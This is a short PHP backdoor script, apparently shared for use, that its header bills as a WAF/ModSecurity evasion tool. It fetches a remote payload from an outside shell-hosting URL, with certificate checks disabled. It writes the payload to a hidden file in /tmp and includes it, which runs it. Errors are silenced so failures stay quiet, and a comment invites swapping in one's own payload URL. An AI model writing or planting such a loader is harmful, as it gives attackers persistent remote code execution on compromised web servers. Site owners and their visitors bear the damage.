# 6ickzone TMP Backdoor# Bypass 500 Internal Server Error (WAF/ModSecurity Evasion)# Coded by: 0x6ick - Inspired by L0c4lh34rtz$data = [ 'https://shell.prinsh.com/Nathan/gelay.txt', // Ganti dengan raw payload URL milikmu '/tmp/.sess_' . substr(md5($_SERVER['HTTP_HOST']), 0, 10) . '.php'];@ini_set('display_errors', 0);@set_time_limit(0);@error_reporting(0);if (file_exists($data[1]) && filesize($data[1]) > 0) { include_once($data[1]);} else { try { $payload = get_payload($data[0]); if (stripos($payload, '') !== false) { $f = fopen($data[1], 'w'); fwrite($f, $payload); fclose($f); usleep(500000); // delay kecil echo '<script>location.href="?6ickzone";</script>'; } } catch (Exception $e) { // silent fail }}function get_payload($url) { $ctx = stream_context_create(['http' => ['timeout' => 3]]); $content = @file_get_contents($url, false, $ctx); if (!$content) { $ch = curl_init(); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $content = curl_exec($ch); curl_close($ch); } return $content;}